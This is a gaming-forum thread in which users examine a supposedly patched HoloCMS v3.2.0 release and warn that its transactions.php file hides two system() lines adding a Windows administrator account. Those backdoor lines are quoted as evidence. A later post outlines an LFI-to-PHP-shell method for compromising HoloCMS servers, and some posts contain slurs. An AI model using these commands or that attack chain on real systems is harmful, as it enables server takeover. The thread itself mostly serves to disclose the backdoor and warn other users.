HoloCMS v3.2.0 (Patched Edition)

Habba Hotel (www.habba.io)
Status
Not open for further replies.
omg install.php config error mysql only 1 ? bugz
screen:
apellido - HoloCMS v3.2.0 (Patched Edition) - RaGEZONE Forums


please help my
 
People on Otaku have been saying this is a virus. Just like to say that I have checked it out and it is not a virus before people bring that cancer here as well
 
Mr. Oni said:
People on Otaku have been saying this is a virus. Just like to say that I have checked it out and it is not a virus before people bring that cancer here as well
Click to expand...
I think they were referring to another "patch" released by j00p a few days ago, I'll check this out and see if it's clean.

EDIT:
Ok, svn diff results:
index.php - Changed to new v32 format. VERY dirty coding, made me facepalm multiple times. BROKE encryption, so if you have users, then cookies will stop working. Removed my email-force-verify feature. ZERO security fix found.

me.php - Fixed the events XSS exploit (the incorrect way, I'll tell you the correct way below).

transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.
Code: 
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");

What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other then the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advice you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updateing the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

EDIT 2: Lol at PM from Pixalz
**** off with your crappy fag posts with posting it add users >.<
Click to expand...
, either he's in on the whole thing or he's the most ignorant guy here. Wait, I take that back. He's the most stupid ignorant guy here.
 
Last edited:
yifan_lu said:
transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.
Code: 
system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");

What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other then the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advice you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updateing the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

EDIT 2: Lol at PM from Pixalz , either he's in on the whole thing or he's the most ignorant guy here. Wait, I take that back. He's the most stupid ignorant guy here.
Click to expand...

So,
Habmoon.
There is a virus found.
Also,
I doubt he'd lie about it :P:ott1:
 
Retro! said:
So,
Habmoon.
There is a virus found.
Also,
I doubt he'd lie about it :P:ott1:
Click to expand...

Layout said:
yes there is a virus + a keylogger in file
Click to expand...

Ok, the term virus is kinda misleading. It doesn't IMMEDIATELY do damage to your computer as a virus does. It creates a administrator account under the name 'letmein' with no password. It will ONLY do harm when the attacker logs in to your server and does things. It is a "backdoor Trojan".

No, there is no keylogger.

Also if you have ANY doubt of what I'm saying, just download the file and open transactions.php with any text editor (Notepad), scroll to the end of the file (line 122+123 to be exact) and see the two lines.
 
When you backdoored this you forgot to add a meta tag so that you could find all the installations of this on google

I rate your faggotry 10/10
 
I just realised as well that this is the most retarded of ways to backdoor a system. For a start most PHP installations have system() disabled by default (including xampp).

Secondly, if you're going to backdoor, do it right. Add an LFI (local file include) and use that to read the config.php file. This will bypass all chmod permissions as it is in the same directory, so just use include() to bypass safe_mode, open_basedir etc. Then use that to get into the database, and you can inject a PHP shell into the title tables in the database (for example the credits.php "How can I buy credits" table)

Then when you visit credits.php, the PHP shell will be there and because you injected it into the PHP from MySQL, the system is none the wiser and the file is still owned by owner. This will pretty much allow you to modify any of the HoloCMS files.

LFI is the method that I used to successfully compromise holocms.com and damaged can be reduced by CHMODing all the files 6**, so they are only readable by the owner.

Learn 2 hack please
 
Status
Not open for further replies.

RaGEZONE Sponsor

    HyperFilter

About RaGEZONE

RaGEZONE® is the top forum for MMO, MMORPG, and mobile game development. We provide binaries, source codes, and tutorials for your favorite games, making it the go-to resource for developers and fans. You can also find and share private servers, fostering a vibrant gamer community.

Forum Statistics

Members online
931
Guests online
2,963
Total visitors
3,894
Totals may include hidden visitors.

RaGEZONE Partners

    nongamstopbets.com UK sites not on GamStop Casino Deps NZ
Back